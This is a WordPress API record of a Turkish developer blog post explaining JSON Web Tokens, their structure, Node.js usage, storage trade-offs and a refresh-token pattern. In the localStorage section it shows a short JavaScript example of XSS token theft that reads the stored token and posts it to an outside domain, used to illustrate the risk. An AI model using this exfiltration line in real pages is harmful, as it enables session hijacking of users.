{"id":173,"date":"2025-11-09T11:19:36","date_gmt":"2025-11-09T11:19:36","guid":{"rendered":"https:\/\/www.mucahitakin.com\/blog\/?p=173"},"modified":"2025-11-09T11:19:37","modified_gmt":"2025-11-09T11:19:37","slug":"jwtjson-web-tokens-nedir-nasil-calisir","status":"publish","type":"post","link":"https:\/\/www.mucahitakin.com\/blog\/jwtjson-web-tokens-nedir-nasil-calisir\/","title":{"rendered":"JWT(JSON Web Tokens) Nedir? Nas\u0131l \u00c7al\u0131\u015f\u0131r?"},"content":{"rendered":"\n

JWT (JSON Web Token), taraflar aras\u0131nda bilgi g\u00fcvenli bir \u015fekilde JSON nesnesi olarak iletmek i\u00e7in kullan\u0131lan a\u00e7\u0131k bir standartt\u0131r (RFC 7519). \u00d6zellikle modern web uygulamalar\u0131nda kimlik do\u011frulama ve yetkilendirme i\u015flemlerinde yayg\u0131n olarak kullan\u0131l\u0131r.<\/p>\n\n\n\n

JWT’nin Yap\u0131s\u0131<\/h3>\n\n\n\n

JWT \u00fc\u00e7 ana b\u00f6l\u00fcmden olu\u015fur ve bu b\u00f6l\u00fcmler nokta (.) ile ayr\u0131l\u0131r:<\/p>\n\n\n\n

Header.Payload.Signature<\/strong><\/p>\n\n\n\n

Header<\/h4>\n\n\n\n
{\n  \"alg\": \"HS256\",\n  \"typ\": \"JWT\"\n}<\/code><\/pre>\n\n\n\n
alg<\/strong>: \u0130mzalama algoritmas\u0131 (HS256, RS256 vb.)<\/p>\n\n\n\n
typ<\/strong>: Token t\u00fcr\u00fc (genelde JWT)<\/p>\n\n\n\n
Payload<\/h3>\n\n\n\n
Payload, ta\u015f\u0131nan verileri (claims) i\u00e7erir. \u00dc\u00e7 t\u00fcr claim vard\u0131r:<\/p>\n\n\n\n
iss<\/code>\u00a0(issuer): <\/strong>Token’\u0131 olu\u015fturan<\/p>\n\n\n\n
exp<\/code>\u00a0(expiration): <\/strong>Son kullanma tarihi<\/p>\n\n\n\n
sub<\/code>\u00a0(subject):<\/strong> Token’\u0131n konusu<\/p>\n\n\n\n
aud<\/code>\u00a0(audience): <\/strong>Hedef kitle<\/p>\n\n\n\n
Public Claims:<\/strong> Herkese a\u00e7\u0131k, standart olmayan claimler<\/p>\n\n\n\n
Private Claims:<\/strong>\u00a0Taraflar aras\u0131nda \u00f6zel olarak anla\u015f\u0131lan bilgiler.<\/p>\n\n\n\n
{\n  \"sub\": \"1234567890\",\n  \"name\": \"Ahmet Y\u0131lmaz\",\n  \"admin\": true,\n  \"exp\": 1735991234\n}<\/code><\/pre>\n\n\n\n
Signature<\/h3>\n\n\n\n
Signature<\/strong>,\u00a0token’\u0131n b\u00fct\u00fcnl\u00fc\u011f\u00fcn\u00fc do\u011frulamak i\u00e7in kullan\u0131l\u0131r. Header ve Payload’\u0131n encode edilmi\u015f hali al\u0131n\u0131r ve gizli anahtar ile \u015fifrelenir.<\/p>\n\n\n\n
HMACSHA256(\n  base64UrlEncode(header) + \".\" + base64UrlEncode(payload),\n  secret\n)<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
JWT Nas\u0131l \u00c7al\u0131\u015f\u0131r?<\/h2>\n\n\n\n
Kullan\u0131c\u0131,\u00a0kullan\u0131c\u0131 ad\u0131 ve \u015fifre ile sisteme giri\u015f yapar. Sunucu,\u00a0kimlik bilgilerini do\u011frular ve ge\u00e7erliyse bir JWT olu\u015fturur. Token i\u00e7ine kullan\u0131c\u0131 bilgileri (user ID,\u00a0roller vb.) yerle\u015ftirilir ve gizli anahtar ile imzalan\u0131r. Olu\u015fturulan JWT,\u00a0istemciye (taray\u0131c\u0131,\u00a0mobil uygulama) g\u00f6nderilir. \u0130stemci bunu genelde localStorage veya cookie’de saklar. \u0130stemci,\u00a0korumal\u0131 kaynaklara eri\u015fmek istedi\u011finde JWT’yi HTTP header’\u0131nda g\u00f6nderir: Authorization:\u00a0Bearer <token><\/p>\n\n\n\n
Sunucu, gelen token’\u0131 al\u0131r ve do\u011frular. \u0130mzay\u0131 kontrol eder. S\u00fcre dolmu\u015f mu kontrol eder.(exp) Payload’daki bilgileri okur. Token ge\u00e7erliyse istek i\u015flenir, de\u011filse 401 Unauthorized hatas\u0131 d\u00f6ner.<\/p>\n\n\n\n
JWT’nin Avantajlar\u0131<\/h3>\n\n\n\n
Durumsuzluk (Stateless):<\/strong> Sunucu taraf\u0131nda oturum bilgisi saklanmaz. Her \u015fey token’da bulunur, bu da \u00f6l\u00e7eklenebilirli\u011fi art\u0131r\u0131r.<\/p>\n\n\n\n
Ta\u015f\u0131nabilirlik:<\/strong> Farkl\u0131 domainler ve servisler aras\u0131nda kolayca kullan\u0131labilir. Mikroservis mimarileri i\u00e7in idealdir.<\/p>\n\n\n\n
Kompaktl\u0131k:<\/strong> URL, POST parametresi veya HTTP header’\u0131nda kolayca g\u00f6nderilebilecek kadar k\u00fc\u00e7\u00fckt\u00fcr.<\/p>\n\n\n\n
G\u00fcvenlik:<\/strong> \u0130mza sayesinde token’\u0131n de\u011fi\u015ftirilip de\u011fi\u015ftirilmedi\u011fi anla\u015f\u0131l\u0131r.<\/p>\n\n\n\n
G\u00fcvenlik \u00d6nlemleri<\/h3>\n\n\n\n
HTTPS Kullan\u0131m\u0131:<\/strong> JWT her zaman HTTPS \u00fczerinden iletilmelidir, aksi halde man-in-the-middle sald\u0131r\u0131lar\u0131na a\u00e7\u0131k olur.<\/p>\n\n\n\n
Gizli Anahtar\u0131n Korunmas\u0131:<\/strong> \u0130mzalama i\u00e7in kullan\u0131lan secret key kesinlikle g\u00fcvenli tutulmal\u0131d\u0131r.<\/p>\n\n\n\n
Token S\u00fcresi:<\/strong> Tokenlar i\u00e7in k\u0131sa s\u00fcre (15-30 dk) belirlenip refresh token mekanizmas\u0131 kullan\u0131lmal\u0131d\u0131r.<\/p>\n\n\n\n
Hassas Bilgiler:<\/strong> Payload Base64 ile kodlan\u0131r ama \u015fifrelenmez. Hassas bilgiler (\u015fifre, kredi kart\u0131) JWT’de saklanmamal\u0131d\u0131r.<\/p>\n\n\n\n
XSS ve CSRF Korumas\u0131:<\/strong> localStorage kullan\u0131l\u0131yorsa XSS’e, cookie kullan\u0131l\u0131yorsa CSRF’e kar\u015f\u0131 \u00f6nlem al\u0131nmal\u0131d\u0131r.<\/p>\n\n\n\n
JWT vs Session Kar\u015f\u0131la\u015ft\u0131rmas\u0131<\/h2>\n\n\n\n
Session Tabanl\u0131 Yetkilendirme:<\/strong><\/p>\n\n\n\n
    \n
  • Sunucuda oturum bilgisi saklan\u0131r<\/li>\n\n\n\n
  • \u00d6l\u00e7eklenebilirlik zordur<\/li>\n\n\n\n
  • Sunucu kayna\u011f\u0131 t\u00fcketir<\/li>\n<\/ul>\n\n\n\n
    JWT Tabanl\u0131 Yetkilendirme:<\/strong><\/p>\n\n\n\n
      \n
    • Durumsuz (stateless)<\/li>\n\n\n\n
    • Kolay \u00f6l\u00e7eklenebilir<\/li>\n\n\n\n
    • Sunucu kayna\u011f\u0131 t\u00fcketmez<\/li>\n\n\n\n
    • Token’\u0131 iptal etmek zordur<\/li>\n<\/ul>\n\n\n\n
      \u00d6rnek Kullan\u0131m (Node.js)<\/h3>\n\n\n\n
      const jwt = require('jsonwebtoken');\n\n\/\/ Token olu\u015fturma\nconst token = jwt.sign(\n  { userId: 123, role: 'admin' },\n  'gizli-anahtar',\n  { expiresIn: '1h' }\n);\n\n\/\/ Token do\u011frulama\ntry {\n  const decoded = jwt.verify(token, 'gizli-anahtar');\n  console.log(decoded);\n} catch(err) {\n  console.log('Ge\u00e7ersiz token');\n}<\/code><\/pre>\n\n\n\n
      Modern web uygulamalar\u0131nda kimlik do\u011frulama i\u00e7in g\u00fc\u00e7l\u00fc ve esnek bir \u00e7\u00f6z\u00fcmd\u00fcr. Do\u011fru kullan\u0131ld\u0131\u011f\u0131nda g\u00fcvenli ve \u00f6l\u00e7eklenebilir sistemler geli\u015ftirmeyi sa\u011flar. Ancak g\u00fcvenlik \u00f6nlemlerine dikkat edilmesi ve kullan\u0131m senaryosuna g\u00f6re do\u011fru strateji se\u00e7ilmesi \u00f6nemlidir.<\/p>\n\n\n\n
      JWT’yi Nerede Saklamal\u0131: LocalStorage vs Cookie<\/h2>\n\n\n\n
      Bu, web g\u00fcvenli\u011fi alan\u0131nda en \u00e7ok tart\u0131\u015f\u0131lan konulardan biridir. Her iki y\u00f6ntemin de avantajlar\u0131 ve dezavantajlar\u0131 vard\u0131r.<\/p>\n\n\n\n
      \"\"<\/figure>\n\n\n\n
      LocalStorage’da Saklama<\/strong><\/p>\n\n\n\n
      localStorage.setItem('token', jwt);\nconst token = localStorage.getItem('token');<\/code><\/pre>\n\n\n\n
      CSRF’e Kar\u015f\u0131 Do\u011fal Koruma:<\/strong>\u00a0LocalStorage’daki veriler otomatik olarak sunucuya g\u00f6nderilmez, bu y\u00fczden CSRF (Cross-Site Request Forgery) sald\u0131r\u0131lar\u0131na kar\u015f\u0131 do\u011fal bir koruma sa\u011flar.<\/p>\n\n\n\n
      Esnek Kontrol:<\/strong>\u00a0Token’\u0131 ne zaman g\u00f6nderece\u011finize siz karar verirsiniz.<\/p>\n\n\n\n
      XSS’e Kar\u015f\u0131 Savunmas\u0131z:<\/strong>\u00a0En b\u00fcy\u00fck risk! Herhangi bir XSS (Cross-Site Scripting) a\u00e7\u0131\u011f\u0131 varsa, k\u00f6t\u00fc niyetli JavaScript kodu localStorage’a eri\u015fip token’\u0131 \u00e7alabilir.<\/p>\n\n\n\n
      \/\/ K\u00f6t\u00fc niyetli kod\nconst stolenToken = localStorage.getItem('token');\nfetch('https:\/\/mucahitakin.com', { \n  method: 'POST', \n  body: stolenToken \n});<\/code><\/pre>\n\n\n\n
      JavaScript’ten Eri\u015filebilir:<\/strong>\u00a0T\u00fcm JavaScript kodlar\u0131 (\u00fc\u00e7\u00fcnc\u00fc parti k\u00fct\u00fcphaneler dahil) localStorage’a eri\u015febilir.<\/p>\n\n\n\n
      Cookie’de Saklama<\/h3>\n\n\n\n
      HttpOnly Flag ile XSS Korumas\u0131:<\/strong>\u00a0En \u00f6nemli avantaj!\u00a0HttpOnly<\/code>\u00a0flag’i ile cookie, JavaScript’ten eri\u015filemez hale gelir.<\/p>\n\n\n\n
      Otomatik G\u00f6nderim:<\/strong>\u00a0Cookie’ler her istekte otomatik olarak sunucuya g\u00f6nderilir, ekstra kod yazmaya gerek yok.<\/p>\n\n\n\n
      Secure Flag:<\/strong>\u00a0HTTPS \u00fczerinden \u015fifreli iletim zorunlu k\u0131l\u0131nabilir.<\/p>\n\n\n\n
      CSRF Sald\u0131r\u0131lar\u0131na A\u00e7\u0131k:<\/strong>\u00a0Cookie’ler otomatik g\u00f6nderildi\u011fi i\u00e7in CSRF sald\u0131r\u0131lar\u0131na kar\u015f\u0131 \u00f6nlem almak gerekir.<\/p>\n\n\n\n
      SameSite<\/code>\u00a0attribute kullan\u0131m\u0131<\/p>\n\n\n\n
      CSRF token’lar\u0131 eklenmeli<\/p>\n\n\n\n
      Subdomain Problemleri:<\/strong>\u00a0Cookie’ler domain bazl\u0131 \u00e7al\u0131\u015f\u0131r, farkl\u0131 domain’lerde sorun \u00e7\u0131kabilir.<\/p>\n\n\n\n
      CORS Zorluklar\u0131:<\/strong>\u00a0Farkl\u0131 origin’ler aras\u0131 kullan\u0131mda\u00a0credentials: 'include'<\/code>\u00a0gerekir ve CORS yap\u0131land\u0131rmas\u0131 daha karma\u015f\u0131k olabilir.<\/p>\n\n\n\n
      Refresh Token Pattern<\/h2>\n\n\n\n
      En G\u00fcvenli Y\u00f6ntem: HttpOnly Cookie + SameSite<\/p>\n\n\n\n
      Access Token:<\/strong>\u00a0K\u0131sa \u00f6m\u00fcrl\u00fc (5-15 dk), localStorage’da<\/p>\n\n\n\n
      Refresh Token:<\/strong>\u00a0Uzun \u00f6m\u00fcrl\u00fc, HttpOnly cookie’de<\/p>\n\n\n\n
      \/\/ Backend\napp.post('\/login', (req, res) => {\n  const token = jwt.sign({ userId: user.id }, SECRET_KEY);\n  \n  res.cookie('token', token, {\n    httpOnly: true,       \n    secure: true,         \n    sameSite: 'strict',   \n    maxAge: 900000        \n  });\n  \n  res.json({ success: true });\n});\n\n\/\/ Frontend\nfetch('\/api\/protected', {\n  credentials: 'include'  \n});<\/code><\/pre>\n\n\n\n
      Bu yakla\u015f\u0131mda:<\/p>\n\n\n\n
      Access token \u00e7al\u0131nsa bile k\u0131sa s\u00fcrede ge\u00e7ersiz olur.<\/p>\n\n\n\n
      Refresh token HttpOnly oldu\u011fu i\u00e7in XSS’le \u00e7al\u0131namaz.<\/p>\n\n\n\n
      Her iki sald\u0131r\u0131 t\u00fcr\u00fcne kar\u015f\u0131 denge sa\u011flan\u0131r.<\/p>\n\n\n\n
      Modern web uygulamalar\u0131 i\u00e7in\u00a0HttpOnly + Secure + SameSite cookie<\/strong>\u00a0en g\u00fcvenli se\u00e7enektir. Unutmayal\u0131m ki %100 g\u00fcvenli sistem yoktur<\/strong>. Her iki y\u00f6ntemi de se\u00e7seniz, XSS ve CSRF a\u00e7\u0131klar\u0131n\u0131 kapatmak, HTTPS kullanmak, input validation yapmak ve g\u00fcvenlik g\u00fcncellemelerini takip etmek en \u00f6nemli unsurlard\u0131r.<\/p>\n","protected":false},"excerpt":{"rendered":"
      JWT (JSON Web Token), taraflar aras\u0131nda bilgi g\u00fcvenli bir \u015fekilde JSON nesnesi olarak iletmek i\u00e7in kullan\u0131lan a\u00e7\u0131k bir standartt\u0131r (RFC 7519). \u00d6zellikle modern web uygulamalar\u0131nda kimlik do\u011frulama ve yetkilendirme i\u015flemlerinde yayg\u0131n olarak kullan\u0131l\u0131r. JWT’nin Yap\u0131s\u0131 JWT \u00fc\u00e7 ana b\u00f6l\u00fcmden olu\u015fur ve bu b\u00f6l\u00fcmler nokta (.) ile ayr\u0131l\u0131r: Header.Payload.Signature Header alg: \u0130mzalama algoritmas\u0131 (HS256, RS256 vb.) […]<\/p>\n","protected":false},"author":1,"featured_media":175,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[108,20],"tags":[137,136,138,139,140],"class_list":["post-173","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-web-guvenligi","category-yazilim","tag-jwt","tag-jwt-nedir","tag-jwt-vs-session-karsilastirmasi","tag-jwtyi-nerede-saklamali-localstorage-vs-cookie","tag-refresh-token-pattern"],"yoast_head":"\nJWT(JSON Web Tokens) Nedir? Nas\u0131l \u00c7al\u0131\u015f\u0131r? - Mucahit Akin<\/title>\n<meta name=\"description\" content=\"JWT(JSON Web Tokens) Nedir? Nas\u0131l \u00c7al\u0131\u015f\u0131r? Kullan\u0131c\u0131, kullan\u0131c\u0131 ad\u0131 ve \u015fifre ile sisteme giri\u015f yapar. Sunucu, kimlik bilgilerini do\u011frular ve ge\u00e7erliyse bir JWT olu\u015fturur.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.mucahitakin.com\/blog\/jwtjson-web-tokens-nedir-nasil-calisir\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"JWT(JSON Web Tokens) Nedir? Nas\u0131l \u00c7al\u0131\u015f\u0131r? - Mucahit Akin\" \/>\n<meta property=\"og:description\" content=\"JWT(JSON Web Tokens) Nedir? Nas\u0131l \u00c7al\u0131\u015f\u0131r? Kullan\u0131c\u0131, kullan\u0131c\u0131 ad\u0131 ve \u015fifre ile sisteme giri\u015f yapar. Sunucu, kimlik bilgilerini do\u011frular ve ge\u00e7erliyse bir JWT olu\u015fturur.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mucahitakin.com\/blog\/jwtjson-web-tokens-nedir-nasil-calisir\/\" \/>\n<meta property=\"og:site_name\" content=\"Mucahit Akin\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-09T11:19:36+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-11-09T11:19:37+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mucahitakin.com\/blog\/wp-content\/uploads\/2025\/11\/bear-token.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"1080\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"akinmucahit\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"akinmucahit\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mucahitakin.com\/blog\/jwtjson-web-tokens-nedir-nasil-calisir\/\",\"url\":\"https:\/\/www.mucahitakin.com\/blog\/jwtjson-web-tokens-nedir-nasil-calisir\/\",\"name\":\"JWT(JSON Web Tokens) Nedir? Nas\u0131l \u00c7al\u0131\u015f\u0131r? - Mucahit Akin\",\"isPartOf\":{\"@id\":\"https:\/\/www.mucahitakin.com\/blog\/#website\"},\"datePublished\":\"2025-11-09T11:19:36+00:00\",\"dateModified\":\"2025-11-09T11:19:37+00:00\",\"author\":{\"@id\":\"https:\/\/www.mucahitakin.com\/blog\/#\/schema\/person\/44941b8386ec7b7a0d538904d2340229\"},\"description\":\"JWT(JSON Web Tokens) Nedir? Nas\u0131l \u00c7al\u0131\u015f\u0131r? Kullan\u0131c\u0131, kullan\u0131c\u0131 ad\u0131 ve \u015fifre ile sisteme giri\u015f yapar. Sunucu, kimlik bilgilerini do\u011frular ve ge\u00e7erliyse bir JWT olu\u015fturur.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mucahitakin.com\/blog\/jwtjson-web-tokens-nedir-nasil-calisir\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mucahitakin.com\/blog\/jwtjson-web-tokens-nedir-nasil-calisir\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mucahitakin.com\/blog\/jwtjson-web-tokens-nedir-nasil-calisir\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.mucahitakin.com\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"JWT(JSON Web Tokens) Nedir? Nas\u0131l \u00c7al\u0131\u015f\u0131r?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mucahitakin.com\/blog\/#website\",\"url\":\"https:\/\/www.mucahitakin.com\/blog\/\",\"name\":\"Mucahit Akin\",\"description\":\"Developer\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mucahitakin.com\/blog\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mucahitakin.com\/blog\/#\/schema\/person\/44941b8386ec7b7a0d538904d2340229\",\"name\":\"akinmucahit\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mucahitakin.com\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/82dcabbf8a64b74dd355ead89fff0ec94009a84485c2a3d0ba8de4a2ba25576b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/82dcabbf8a64b74dd355ead89fff0ec94009a84485c2a3d0ba8de4a2ba25576b?s=96&d=mm&r=g\",\"caption\":\"akinmucahit\"},\"sameAs\":[\"https:\/\/www.mucahitakin.com\/blog\"],\"url\":\"https:\/\/www.mucahitakin.com\/blog\/author\/akinmucahit\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"JWT(JSON Web Tokens) Nedir? Nas\u0131l \u00c7al\u0131\u015f\u0131r? - Mucahit Akin","description":"JWT(JSON Web Tokens) Nedir? Nas\u0131l \u00c7al\u0131\u015f\u0131r? Kullan\u0131c\u0131, kullan\u0131c\u0131 ad\u0131 ve \u015fifre ile sisteme giri\u015f yapar. Sunucu, kimlik bilgilerini do\u011frular ve ge\u00e7erliyse bir JWT olu\u015fturur.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.mucahitakin.com\/blog\/jwtjson-web-tokens-nedir-nasil-calisir\/","og_locale":"en_US","og_type":"article","og_title":"JWT(JSON Web Tokens) Nedir? Nas\u0131l \u00c7al\u0131\u015f\u0131r? - Mucahit Akin","og_description":"JWT(JSON Web Tokens) Nedir? Nas\u0131l \u00c7al\u0131\u015f\u0131r? Kullan\u0131c\u0131, kullan\u0131c\u0131 ad\u0131 ve \u015fifre ile sisteme giri\u015f yapar. Sunucu, kimlik bilgilerini do\u011frular ve ge\u00e7erliyse bir JWT olu\u015fturur.","og_url":"https:\/\/www.mucahitakin.com\/blog\/jwtjson-web-tokens-nedir-nasil-calisir\/","og_site_name":"Mucahit Akin","article_published_time":"2025-11-09T11:19:36+00:00","article_modified_time":"2025-11-09T11:19:37+00:00","og_image":[{"width":1920,"height":1080,"url":"https:\/\/www.mucahitakin.com\/blog\/wp-content\/uploads\/2025\/11\/bear-token.png","type":"image\/png"}],"author":"akinmucahit","twitter_card":"summary_large_image","twitter_misc":{"Written by":"akinmucahit","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.mucahitakin.com\/blog\/jwtjson-web-tokens-nedir-nasil-calisir\/","url":"https:\/\/www.mucahitakin.com\/blog\/jwtjson-web-tokens-nedir-nasil-calisir\/","name":"JWT(JSON Web Tokens) Nedir? Nas\u0131l \u00c7al\u0131\u015f\u0131r? - Mucahit Akin","isPartOf":{"@id":"https:\/\/www.mucahitakin.com\/blog\/#website"},"datePublished":"2025-11-09T11:19:36+00:00","dateModified":"2025-11-09T11:19:37+00:00","author":{"@id":"https:\/\/www.mucahitakin.com\/blog\/#\/schema\/person\/44941b8386ec7b7a0d538904d2340229"},"description":"JWT(JSON Web Tokens) Nedir? Nas\u0131l \u00c7al\u0131\u015f\u0131r? Kullan\u0131c\u0131, kullan\u0131c\u0131 ad\u0131 ve \u015fifre ile sisteme giri\u015f yapar. Sunucu, kimlik bilgilerini do\u011frular ve ge\u00e7erliyse bir JWT olu\u015fturur.","breadcrumb":{"@id":"https:\/\/www.mucahitakin.com\/blog\/jwtjson-web-tokens-nedir-nasil-calisir\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mucahitakin.com\/blog\/jwtjson-web-tokens-nedir-nasil-calisir\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.mucahitakin.com\/blog\/jwtjson-web-tokens-nedir-nasil-calisir\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.mucahitakin.com\/blog\/"},{"@type":"ListItem","position":2,"name":"JWT(JSON Web Tokens) Nedir? Nas\u0131l \u00c7al\u0131\u015f\u0131r?"}]},{"@type":"WebSite","@id":"https:\/\/www.mucahitakin.com\/blog\/#website","url":"https:\/\/www.mucahitakin.com\/blog\/","name":"Mucahit Akin","description":"Developer","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mucahitakin.com\/blog\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.mucahitakin.com\/blog\/#\/schema\/person\/44941b8386ec7b7a0d538904d2340229","name":"akinmucahit","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mucahitakin.com\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/82dcabbf8a64b74dd355ead89fff0ec94009a84485c2a3d0ba8de4a2ba25576b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/82dcabbf8a64b74dd355ead89fff0ec94009a84485c2a3d0ba8de4a2ba25576b?s=96&d=mm&r=g","caption":"akinmucahit"},"sameAs":["https:\/\/www.mucahitakin.com\/blog"],"url":"https:\/\/www.mucahitakin.com\/blog\/author\/akinmucahit\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mucahitakin.com\/blog\/wp-json\/wp\/v2\/posts\/173","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mucahitakin.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mucahitakin.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mucahitakin.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mucahitakin.com\/blog\/wp-json\/wp\/v2\/comments?post=173"}],"version-history":[{"count":1,"href":"https:\/\/www.mucahitakin.com\/blog\/wp-json\/wp\/v2\/posts\/173\/revisions"}],"predecessor-version":[{"id":177,"href":"https:\/\/www.mucahitakin.com\/blog\/wp-json\/wp\/v2\/posts\/173\/revisions\/177"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mucahitakin.com\/blog\/wp-json\/wp\/v2\/media\/175"}],"wp:attachment":[{"href":"https:\/\/www.mucahitakin.com\/blog\/wp-json\/wp\/v2\/media?parent=173"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mucahitakin.com\/blog\/wp-json\/wp\/v2\/categories?post=173"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mucahitakin.com\/blog\/wp-json\/wp\/v2\/tags?post=173"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}